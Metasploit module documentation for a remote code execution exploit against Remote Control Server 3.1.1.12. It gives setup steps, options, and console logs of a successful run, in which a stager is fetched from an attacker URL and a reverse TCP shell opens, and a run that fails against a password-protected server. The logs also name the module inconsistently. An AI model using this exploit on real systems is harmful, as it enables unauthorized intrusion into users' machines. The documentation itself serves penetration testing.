## Vulnerable Application This module utilizes the Remote Control Server's, part of the Remote Control Collection by Steppschuh, protocol to deploy a payload and run it from the server. This module will only deploy a payload if the server is set without a password (default). Tested against 3.1.1.12, current at the time of module writing Version 3.1.1.12 can be downloaded from http://remote-control-collection.com/ ## Verification Steps 1. Install the application 2. Start msfconsole 3. Do: `use exploit/windows/misc/remote_control_collection_rce` 4. Set `rhost` and `lhost` as required. 5. Do: `run` 6. You should get a shell as the user who is running Remote Mouse. ## Options ### PATH The location to write the payload to Defaults to `%temp%\\` aka `c:\\Windows\\Temp\\` on most systems. ### SLEEP The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen. Defaults to `1`. ## Scenarios ### Remote Control Server 3.1.1.12 on Windows 10 ``` resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce [*] Using configured payload windows/shell/reverse_tcp resource (remote_mouse.rb)> set rhosts 1.1.1.1 rhosts => 1.1.1.1 resource (remote_mouse.rb)> set lhost 2.2.2.2 lhost => 2.2.2.2 resource (remote_mouse.rb)> set verbose true verbose => true msf6 exploit(windows/misc/remote_mouse_rce) > run [*] Started reverse TCP handler on 2.2.2.2:4444 [*] 1.1.1.1:1978 - Running automatic check ("set AutoCheck false" to disable) [+] 1.1.1.1:1978 - The target appears to be vulnerable. Received handshake with version: 411 [*] 1.1.1.1:1978 - Connecting [*] 1.1.1.1:1978 - Sending Windows key [*] 1.1.1.1:1978 - Opening command prompt [*] 1.1.1.1:1978 - Sending stager [*] 1.1.1.1:1978 - Using URL: http://2.2.2.2:8080/ [+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging [+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging [*] 1.1.1.1:1978 - Executing payload [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 1.1.1.1 [*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49962) at 2022-09-27 16:33:02 -0400 [*] 1.1.1.1:1978 - Server stopped. [!] 1.1.1.1:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target Shell Banner: Microsoft Windows [Version 10.0.16299.125] ----- C:\Users\windows>whoami whoami win10prolicense\windows C:\Users\windows>systeminfo systeminfo Host Name: WIN10PROLICENSE OS Name: Microsoft Windows 10 Pro OS Version: 10.0.16299 N/A Build 16299 ``` ### Remote Control Server 3.1.1.12 on Windows 10, with a password Expected to fail. ``` resource (remote_control_collection.rb)> use exploits/windows/misc/remote_control_collection_rce [*] Using configured payload windows/shell/reverse_tcp resource (remote_control_collection.rb)> set rhosts 1.1.1.1 rhosts => 1.1.1.1 resource (remote_control_collection.rb)> set lhost 2.2.2.2 lhost => 2.2.2.2 resource (remote_control_collection.rb)> set verbose true verbose => true msf6 exploit(windows/misc/remote_control_collection_rce) > exploit [*] Started reverse TCP handler on 2.2.2.2:4444 [*] Connecting and Sending Windows key [*] Opening command prompt [*] Sending stager [*] Using URL: http://2.2.2.2:8080/ [*] Executing payload [*] Server stopped. [!] This exploit may require manual cleanup of 'c:\Windows\Temp\OqsTi76PX80it.exe' on the target [*] Exploit completed, but no session was created ```